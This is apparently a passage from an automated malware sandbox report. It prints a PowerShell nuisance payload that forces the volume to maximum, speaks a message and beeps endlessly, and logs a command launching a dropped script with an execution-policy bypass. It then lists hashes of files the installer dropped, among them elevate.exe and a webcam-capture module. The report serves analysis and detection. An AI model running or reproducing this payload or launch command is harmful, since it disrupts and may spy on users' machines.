mute)); return mute; } set { Marshal.ThrowExceptionForHR(Vol().SetMute(value, System.Guid.Empty)); } } } '@ 
[audio]::Mute = $false [audio]::Volume = 1 Add-Type -AssemblyName System.speech $speak = New-Object System.Speech.Synthesis.SpeechSynthesizer $speak.Speak(\"Nova Sentinel On Top\") $sustain = 1; $pause = 1; while ($true) { [console]::beep(990,250*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(1188,250*$sustain); [console]::beep(1320,125*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(990,250*$sustain); [console]::beep(880,500*$sustain); [console]::beep(880,250*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(1320,500*$sustain); [console]::beep(1188,250*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(990,750*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(1188,500*$sustain); [console]::beep(1320,500*$sustain); [console]::beep(1056,500*$sustain); [console]::beep(880,500*$sustain); [console]::beep(880,500*$sustain); sleep -milliseconds (250*$pause); [console]::beep(1188,500*$sustain); [console]::beep(1408,250*$sustain); [console]::beep(1760,500*$sustain); [console]::beep(1584,250*$sustain); [console]::beep(1408,250*$sustain); [console]::beep(1320,750*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(1320,500*$sustain); [console]::beep(1188,250*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(990,500*$sustain); [console]::beep(990,250*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(1188,500*$sustain); [console]::beep(1320,500*$sustain); [console]::beep(1056,500*$sustain); [console]::beep(880,500*$sustain); [console]::beep(880,500*$sustain); sleep -milliseconds (500*$pause); [console]::beep(1320,500*$sustain); [console]::beep(990,250*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(1188,250*$sustain); [console]::beep(1320,125*$sustain); [console]::beep(1188,125*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(990,250*$sustain); [console]::beep(880,500*$sustain); [console]::beep(880,250*$sustain); 
[console]::beep(1056,250*$sustain); [console]::beep(1320,500*$sustain); [console]::beep(1188,250*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(990,750*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(1188,500*$sustain); [console]::beep(1320,500*$sustain); [console]::beep(1056,500*$sustain); [console]::beep(880,500*$sustain); [console]::beep(880,500*$sustain); sleep -milliseconds (250*$pause); [console]::beep(1188,500*$sustain); [console]::beep(1408,250*$sustain); [console]::beep(1760,500*$sustain); [console]::beep(1584,250*$sustain); [console]::beep(1408,250*$sustain); [console]::beep(1320,750*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(1320,500*$sustain); [console]::beep(1188,250*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(990,500*$sustain); [console]::beep(990,250*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(1188,500*$sustain); [console]::beep(1320,500*$sustain); [console]::beep(1056,500*$sustain); [console]::beep(880,500*$sustain); [console]::beep(880,500*$sustain); sleep -milliseconds (500*$pause); [console]::beep(660,1000*$sustain); [console]::beep(528,1000*$sustain); [console]::beep(594,1000*$sustain); [console]::beep(495,1000*$sustain); [console]::beep(528,1000*$sustain); [console]::beep(440,1000*$sustain); [console]::beep(419,1000*$sustain); [console]::beep(495,1000*$sustain); [console]::beep(660,1000*$sustain); [console]::beep(528,1000*$sustain); [console]::beep(594,1000*$sustain); [console]::beep(495,1000*$sustain); [console]::beep(528,500*$sustain); [console]::beep(660,500*$sustain); [console]::beep(880,1000*$sustain); [console]::beep(838,2000*$sustain); [console]::beep(660,1000*$sustain); [console]::beep(528,1000*$sustain); [console]::beep(594,1000*$sustain); [console]::beep(495,1000*$sustain); [console]::beep(528,1000*$sustain); [console]::beep(440,1000*$sustain); [console]::beep(419,1000*$sustain); [console]::beep(495,1000*$sustain); 
[console]::beep(660,1000*$sustain); [console]::beep(528,1000*$sustain); [console]::beep(594,1000*$sustain); [console]::beep(495,1000*$sustain); [console]::beep(528,500*$sustain); [console]::beep(660,500*$sustain); [console]::beep(880,1000*$sustain); [console]::beep(838,2000*$sustain); $sustain=$sustain*0.8 $pause=$pause*0.8 }"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut0yn5i.ps1" -RunAsAdministrator"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut0yn5i.ps1" -RunAsAdministrator

Network


Files


C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\am.pak

MD5 e18a450ef034b42599341c3d09f280f1
SHA1 2001c8a85904962ac3a96938eccc69ad2c110fdf
SHA256 7c2b9098130f1f9e0cf4507b64c0e96ac6354bd6c3616be20e2067cfccc820da
SHA512 ddd87571218fe9f179a6c2a8a15b182625a71a7c19ed90c0969ca2e0e9bad823b926f8b8a6b390cb6fe9c95f4b6c1f1ec7b5167a8424ab1921943922208f798a

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\da.pak

MD5 55a8f5883805a65c854d25edb3959209
SHA1 d4b3b6bd2a26cbd021fa931d1f63c9ea64e2c268
SHA256 e190187adcbb5f829d162660968ba598ed17bd11339062ca4d807deec8a27fdb
SHA512 4e1f9e6da32f553cbc8cf162726d7aba9e23e2216d6d05b995cf19fff3aafa05ed08fce29b2f8538d46583366402b8630672e650dfbd46952a611e9db0d8016d

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\cs.pak

MD5 3cfd9dc564cfcc33cc5524711365c376
SHA1 2e5016d2643017f37658262122974429f18625a2
SHA256 8be34e4f8226c1dd4e725711ddd884ef4476560f7863edcf378573dde9db3cee
SHA512 6ee156d2fa3b6f601df28e38968d0eae2812d70b41333348dbecd833d5ee6ff944183f0eecde96be433cf1e98c8ec22d6a6d5af5153145842175ab43c73533ef

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\el.pak

MD5 38440b98bfdf5ed496da0f49d59534c0
SHA1 1498d9207ecaf4923a47271e24c68a817041c82e
SHA256 b1f78df8a7edc914357a2e90bc8dc0ac46f4df642bb22894569fe4905fb8ea0f
SHA512 95ba788fc2e1f07d54e398f1ec4d32c664cfb13118d46cb7af7a993367e032b10de84f3e604ab6e659d6410e2d736097ec5e9b3b002040c54412358f0ea10229

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\de.pak

MD5 b73344e5a72fca6f956dbab984c123ba
SHA1 0561073aa40a63a9ce9930dd18b18e12ff139b2b
SHA256 6dda3fa65232ca0bff7314f916942a2aa5d9be73a0b0c7a6d016eb34ea6fff5b
SHA512 e8a12da397369f23c102244b3f18f533ec79afa6978785566056bbfe07b10a21ff4973bf17aa829fff65609363988c033b0e48d4a82c846863377c08d8df009d

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\et.pak

MD5 c76db3385190c6840315c4497e40258a
SHA1 34f1aef2ba2925bebc5dcdb70e5b6c1a138a5c46
SHA256 e8af084ef5e1062c5966dd7802074ac24f3672dc3c9b9c5453a397644727191f
SHA512 90a870369d307758b33d74e6213676d65c2d332f42577c8aff23d96b512f3c2a2bdace8d6d9007f88b9175eadc6f2ae28b498b1265550849ff9317465a37ad29

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\es.pak

MD5 f83d8f7f6108786c02c2edbf3d85f147
SHA1 57781d9d9eb7c90cdc71f78e25d0763045b6d29a
SHA256 5b929216ac823dbe2b0bb98e64db76519900e09a86c8513019325271c66ade0d
SHA512 12747a4a61cdd21cad6e3f768cb43b8bda5ec9de373337c191b6994b20acd676c9d0a6cde8410a1e18f35dd5d2d332ea1bb7e7f8f6fc4b73d8774559e33398f1

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\es-419.pak

MD5 b261b1efe945365588befdf68879040f
SHA1 616f44a5f73f0449b483f36ccf831db6474a10d2
SHA256 1380b9edc9cee4b505f12e8eefa288d8c746ca995b52ceaba27c7741ae8a5cd4
SHA512 9ea14234b9d4d09364e5727b3886fc14544d52508b3e45fb9fd607ca88d2e432361a02b2f7ba34c3d6ecd94b91f9eccd4d54047a97a1ba4eea580ead00b91cff

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\en-US.pak

MD5 0bb857860d8c9ab6d617cea5a5bd4d00
SHA1 351b744d95846bff2ce5f542fec2e87439aa0f8b
SHA256 5c56df9699fc7e8f09ec81421e50a6264cde055e822f5a8cd9bb1edb3066d816
SHA512 33fb73cffbb6781488cedbca4c92a7e4f66923a799beeb7f5cba58dbc23ba8f5130f63a7dac7114e3c3ef6f1df87884fbeb8858bc7604aec9449fdfd16c25078

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\en-GB.pak

MD5 52e2826fb5814776d47a7fcaf55cb675
SHA1 51fbbc59dcd61116cbc0a24b0304d4c1c58e8d0b
SHA256 83ff81c73228c7cadba984d9b500e4fce01de583ecde8f132137650c8107c454
SHA512 69257f976d01006c5f3d7e256738c97c59115471f8e7447cfa795f7fa4ff12d6fd19708e95ffb2aa494b50c1763fe35d5885b9414112d2934baf68fe668ed7cc

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\fa.pak

MD5 6458a239e994d8d18315deccd35389ed
SHA1 75c985f43503a6c44645786d46639a6b555ae163
SHA256 300fc1c735e92917a5ddf92feb812cbf3175d988ec7ad5955110248a1addbd34
SHA512 3062075b6be0c25c957ac88e537880bc25ff86b8ef0703a05209e9676e943e89476b7997394aeb25064e03a93be614fef535676e9cdfaf44b46035225b1b2cf5

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\fil.pak

MD5 40bddaf97f64dfea9ebafc7f82166f80
SHA1 90d1fde3c0b27d2184f0353991259c2a92c7820c
SHA256 39a9d63736e7b4593fc6873ed3c19d45fbf9eb78a012bfdcee0fea5906ebc5b2
SHA512 d1e61c53e09a0dc50edf5aba5cf286a251ee88421aa2cd49332b70a5859646605ecb7d0bb97ea7242d14a18742e23da0a14c04b0b99b57a466ec87f4f66b897e

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\ja.pak

MD5 833e8c4aa70351b6be7bd403e4e9a0a7
SHA1 46ccdbdea35deec8ef13a5fc833776875fad187b
SHA256 74422db1a5f28522f9a8b31a3bee9a6df794b419bf723cb6a6c88e82eb72cec0
SHA512 e8e709612a5ea81d2822e0025b7306f38571f2cec2ca72ac5a8ab852a0e36a0f5bc7e00d0baf7ac7becc2c54dda3a17c52ec1cd67ce12b14d91b6ae0b726d556

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\lv.pak

MD5 264c6e20b3088ceb4dae5773cef0cb55
SHA1 fb6ff83ff14df008092bc3ee73bda7491e8e090e
SHA256 a676a781c1a587eadf23e5c69bc52f2d352346a70bc53ca908450362535eefda
SHA512 01e949f92e1e8599c581929a601d39640abaf1d907ce10102e591c3d490dd3874c679c75bb51308ead55a3bd0c6dcd1b8d4b2daf98ce1cf1c6bab42946e8b1e8

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\lt.pak

MD5 2d4fca437a7548893dc4b51fa5b33c33
SHA1 c1493013d7d981ea9223716e415380992de65c2f
SHA256 776dba792df7b444e1b720326312d8b8312cade74a1372c49456d932b7c65769
SHA512 b6a55ee1deff48d717a3e9399aef3c45eeec810cc5b5709fa3e9f56850115a5b02e02b7959ec77a6797e68516ee9372bacd260e62ac0d55a8e4c1c27af782b42

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\ko.pak

MD5 d6e2c18c9eabba59b50d147d942125ea
SHA1 0918879203c2050b4f9f449f5616e430897ba0b9
SHA256 f3581cea2e5b022b121010ffc5d67f86f717e3a0c0402abd81e24c87fd135b76
SHA512 f605f7b9893166778af156f9eb76eaa1209e7432450899540cd462ce0ffa69caf6f570b910cdd6d7bef54354379e9892a658e711baa93241da33755c107da859

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\kn.pak

MD5 5115cde84b4c674db412619b65433004
SHA1 164f33e7e2e9f685a579da492a6fc8806beb6cbf
SHA256 891e092c6895e23be986c3e6d39dcea9b6b75f1448239c13fd406680e50407a7
SHA512 090a247898cb533325d2b289a6cbd8db2a755ef0abab49d82f333e57b290c50b5996b81f15d8adc30160b216eebed3a1476aec1627195e52189557c1d48b0216

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\id.pak

MD5 e40cb2f3b4db379e4d187aeef0dfd300
SHA1 537b1ebc615c980c89bbe2b9e91a11199fa7d6a6
SHA256 3339ef011c9bb64868da94adb25f4490acbc7f893e4337dbfe2797754cd659f5
SHA512 b87464460077aa55feb92eca8ed23d9a61829378bae7890c8a95dac5fcd735b145d65661f27facfe2586fcaa169692b00d8ee8dd505dc44bff7f7fd090f3e96c

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\hr.pak

MD5 6f92235e6ba003af925a2d6584afd27d
SHA1 3ceba61e9c2975466b6244188f5ea72aaf042fc7
SHA256 479dc4f75a889d45f62b4ddb6eb48f21c473e37875468c9c26d928a263e15840
SHA512 82f2642dff4400704c15c2fa02d0ec74ed3fe888dc835447c1afce7463dee8f480bb81be358c306e681625864a6d25e5cd6c96252b8a56e6fc62014b3aa4d26a

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\hi.pak

MD5 590e9e73df9cbd83cd87b9c03848fec9
SHA1 da125e60a5a2c51a2d6219d3f81688bd22237b59
SHA256 089b9dd31090a987515809a68d26f6eeb64cd9283934e3dcc48b151eec7d3ad9
SHA512 fd0e5d0f2063e12b711275f390428b88f98ffaf6043cdb14b13674ac1e4aa9f70ae820ae960132d7155daf9b1308238775c4702694ab53068cdc709c50f9186a

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\he.pak

MD5 6a02a37e1ca3215fa9ee0e1b0fbcf5e7
SHA1 89a8a126c0bbf536ac58e29fc50e045fb1b88220
SHA256 f5cf34ce58b7f0d450936981aa7ffa060821403e6768eee3746ea4ffc9193986
SHA512 6607eb2329b81f1eaf0ed3a564eddcb30e6ab59229f2fbf6fd3d2140ffaa8853a330eda627a4458ef6bb06f32c5183edda869e34cd4ead1f87f88d5c622c1a16

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\gu.pak

MD5 63a7fdc4eadf8ef1c35c72468a0ce33f
SHA1 e8d064f0e9c8a6a8c6ccb036711e292d011d9466
SHA256 e549ff4e5a094d04c2ce7bc6fd68bea1f03e935437bf164bebb6191c133fa70c
SHA512 0a097ff875132a984545ec677b04f97785f14c38a1df487cfb4722cdea07d14e1e88fcff7d58b82fa53f05f4eba779a95ef320b5a91692097726d0385a26a456

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\fr.pak

MD5 c3095ce1e88b0976ba7bef183d047347
SHA1 b14cfbf6e46ac1f189595fc09660178525301138
SHA256 66488dc10517b6e3638686be95b430477a39304e92ac45dfe62b58cae3a77272
SHA512 29f47b1eff4681a9a17a50d6e82d63c22fe7bfe4ceb79862e81d8cd9f96fa38e225978b4c4b1f8e55b220235b91652c776fa8d2e559c68942c6ccf402812a421

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\fi.pak

MD5 cc592d91ce8eabaa75249cb78b889376
SHA1 f2f0f7f105a17f3e4b1a97ed0e3c2e871c2c3eac
SHA256 b1cb0b32efa78fd8634652c74f298f1d5127f2363ef601cf000417e5c7fefd20
SHA512 58e2eaffe26d8fda8df43e7ebef449cfff1065e940c128efa0276511e34e96e52da9230f294b01d4ecd8ef606b792d372bff897d6d8bb67c31379418ce867d48

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\it.pak

MD5 5aa225aad4f9fe6d05ec24905a827d88
SHA1 f6d5ed337bd8e9cc3b962d3a498e3430fbf6de22
SHA256 96e02ab6937a1f1cb58762159761a737ce0e1dcd6a253554392baf4389326eab
SHA512 3fa928f19bdf65b8fbb274b478a801821b15c01224c113a8d7f6121a077b432c0cc84eefd9028a76adea9fa4bb65dcb868edfbd4368b1e4d477c49e187e4288a

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\hu.pak

MD5 71d42cb22d2d7a8b26c4514ab12df3aa
SHA1 cd0307503a7906f1742d1e98fc816959319c2171
SHA256 b51bcb888dbc27bab88a8c9d081df7496de8a9a5a4cd2cfe08abc154190e75e6
SHA512 29c67391bca706807be3a0cc79fe481f220e30263957a9c2485f0a4c498a5b250bdd83b5f4fad8d0b19c8a9a07d5650b5ebd5816b6aae311a1cde78a89303244

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\ml.pak

MD5 04b2540c25990a5e0a9b227dcce6ae0d
SHA1 4f8ccd154f54dfb083d4d1a3ed0994842c8ab13e
SHA256 556165b8b54c6e21bc66d12b3f5be393136714467c427f7114f314d18ad3c661
SHA512 4cab47e42e8f5d4a83851871f97f3e1360c993ba530dbb4b4b736350779784bd83189e1195d3480ce87298bb8f9b7f249fefa7764d850e5b0002895609626785

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\ms.pak

MD5 6cfadaa784e687e6dadbcd80e631bc9b
SHA1 481acb75f525055bf4e45ecabe0eadcb9c492106
SHA256 fb5e125dd5e1f21e8df229d22cb3d1f9078bd79bbddca352899248f2a8b21b71
SHA512 0d7da5a90fe9372bc704ab8cdc8cbfb14d323cafdef856987e2d9e34d980196c03985e25099f5d1bcb10c97f040f4766e2c3713718649bb3f43914a77f0dbb39

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\pl.pak

MD5 644c0ace25d6e532b56510a736c6bc2c
SHA1 1bd0fec952107b493da04c46423da634ff3e1504
SHA256 2ff9e382a31783285b7d85676e629e2f6db26bb9536ed17b7fbe5ac61a895ec7
SHA512 9a1f1e884c2f214b8b0c63543809ddd4ba0fd533f1d8434e926051f3db434f60cc4df2462c2a43254b2a9685b3869eef49463c212892e417c82c3a7b497e3559

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\nl.pak

MD5 cf6b1cbfd669e9461553974ba37a475e
SHA1 b33867e9bc7fd88ca98a76dc4bd756bcf18887aa
SHA256 9a83ad866ad7fd9d65ecbc1e95c276cfce27e8257c76a16950fd14971e66b864
SHA512 e463029bb37f6bb3ff5cb6281f64291ada1b785fa33137e7aedfc7b5e409e99c75a91e7cf9b6c0933e970f70c14861190de66fc5d68925b687a6f5da02e21077

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\nb.pak

MD5 b61e42f66d581b6a8929cdf5fb10662e
SHA1 6f06fa9ee092fbcb61bbd668734fb3b92cfb549a
SHA256 1b17dcde8fc7308d926fbe0faa83dfc9ffe2efc5715e9afd557dde839ad98b7e
SHA512 79b82346c3f133a6ba44148a8432ad4e08e2805187b759509cb386bc800fd20215592c07d953812c243f0b1d5e1354245f2cb42b2b3eb6c87280bcb4008dbe97

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\mr.pak

MD5 f22c99fe6a838e333e8ee06a4d01296b
SHA1 c3542ea8dd45a2b387dd02fa5687948f135e10f2
SHA256 b03a3042f907aed13253ae8083d08f5fad59ff438d024b097276856e72526911
SHA512 882022c2cb985d85f96d52c9bcfeeb089d6ff30e66187ccf424ef622092b9d359a51bdef1fb6ac3b9d3409aa79d37ca737ba7f3ed8b9cdaabfe04d90a7c8bc15

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\pt-PT.pak

MD5 ecd84b296d3bb312ee18e21017311986
SHA1 f5625523f85c10723750834a54ff59a2dd886fb3
SHA256 fcfaa9c44c445876c286388b6a1abc1df949f3dda3d64fb57d6e0d54a05cdb94
SHA512 e95b74238220024cdd0bd1c0f18beadbbe427d76cd8d6b32d5700adcd34ffb068ad0bf75404921485c8077f395f5111cd40d5dfe2b5b8f34c62e6fc80b507456

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\pt-BR.pak

MD5 88ad860c73676ffb4025b5c691f29942
SHA1 3c5e5b999ea7153ccdd1b4cc7b6162de3456b558
SHA256 25f0bb0b0230d99a9064d52668636f3be85903bf27a68124d79a2fe93c30fe0e
SHA512 41589bb9ab1b8307f62ceb4e6493d7903731a3e63807e0044379c4acdda881c21839234f5f1b8ad1af732bfee6231c0556ce92e582505379ed949980185bb750

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\sk.pak

MD5 b35daa0bd9627ca88b413a5af7c6b4a4
SHA1 d5efdcbc7ca17de29f3075f6434f31ab2e895826
SHA256 f47bc1f7f5ab64681d0b152e1a019da60f0ef057ee8bf2ccede019dc4030c177
SHA512 48abb6ca2290820db2898b05820bb25e70fb1292c816eb0c8f17b3c5452de9fff7027d216d2bf413900f408f44ed4ac99151b28142a212c5cff8dfe229e87b9b

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\ru.pak

MD5 75457b95d2bb03891232dae7db886387
SHA1 e5a7569df7f91533703626d167ecc8cddbd27205
SHA256 e0894d3aa3f8e0f8ac457a3300001d4e1dcf95980712f8c8e9c845eb4c2bbfa6
SHA512 9813239cb162cec24cb81cffdae2df06889782813d917da186ae40df6dae64477467e4b32ead2d714bc1de671538d4c1fde990d83d3ee69e0932f17226687a78

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\sl.pak

MD5 e015b6f5042be2dc96a4e23dcf035502
SHA1 7946509eed8db1e4c1f3da99ffe7155c86fdb4d6
SHA256 99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4
SHA512 b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\sr.pak

MD5 af7083f2a4bd95dcbe792efade352662
SHA1 dc69aa831836016f6e66c6079931503d534a7862
SHA256 e3b80d9fdd420a05d66cc12e685ac94500106dd51a555bbfa2d085094f81e8dd
SHA512 342400ba94f6cd08152f96aa2b905184fab429c38cedb4bcb4ac0c503169a9ecd47aef208b4d7ffae08b0c0afa7aa089347a20739379d05f3e4e111be842b8c4

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\ro.pak

MD5 24b01a438a3ab9699d4ca97c081b5e82
SHA1 0d0b082544d23425a74199fb0a6c11192f0bdf7d
SHA256 38290b1c9712296d82ea1681ef95544a1eef4872289134b11e50af735e6deaca
SHA512 43199772312156f4633c4202499cde8f808e5e632c2013ec1129acee01a3f184e86df2616626173178efe04b6f0773ad9a0e8b8cc6a735d23d68dcfe9dfd945b

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\uk.pak

MD5 d791b1ecf2931b2fb0c31aac170c7cdc
SHA1 02be115a9ff94fe5250651b6de4323eafc44fce1
SHA256 ffae6286d44c8e219ef90d411ad8746159a6ff8ea610e2a651147a3956696a22
SHA512 3a2edb8069e4a9734ce5e02b7c3de3c968c5bbc116f17f52f97e2bb2c78485c456c4f0cc952686c1aa17b7ee4d326a1dda698afafc63c79d842ca3905181a8da

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\th.pak

MD5 43edd25f67ce6e6cea5373009ff0a1f8
SHA1 ed72ca6620cf23837e1334be50ccf616806bc5a2
SHA256 287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0
SHA512 7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\te.pak

MD5 793a87d41cde6e6d1bb086284f69733b
SHA1 d887e3842b664f55b7308427aa6f5bf0b352d879
SHA256 5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255
SHA512 7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\ta.pak

MD5 31dada843d0b4f9a66b184cb6d7b8b92
SHA1 0320b31981043c6e4c17470bf2ff4c7488553511
SHA256 457070b35c813175f5a7b630478073e478ff2bf23915dd3dc7a5b3b339cc2b0b
SHA512 c5b6ea595d3154fd9fe03f49a19f78eb4068718ce005b18a165d491459a290c29956b02a109ce2c314746773760c8e5c0d7064f384c65a572c78109f03538860

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\sw.pak

MD5 99e385ebc1ef8d3daddb3a171fa79edf
SHA1 3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1
SHA256 8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01
SHA512 797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\resources\app.asar

MD5 51c536ac251a81c6a03b3e6f11a03c52
SHA1 06cc7d5317b42ec497bc98ae98c0cef02717819c
SHA256 405539215836611ce6ac020ef6f9fc7afd09e8d99142ffcf83ceb4cffd488f84
SHA512 13d595b3c8af3732ce561fd25425c914dc9115e176352dfde351e2161ed604de3cf4e49a81586fc3228223c28300e38d596f573f83e1cf81043856b3607e57d1

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 c20c205c6f8d70a5e1351a4041a3ec9f
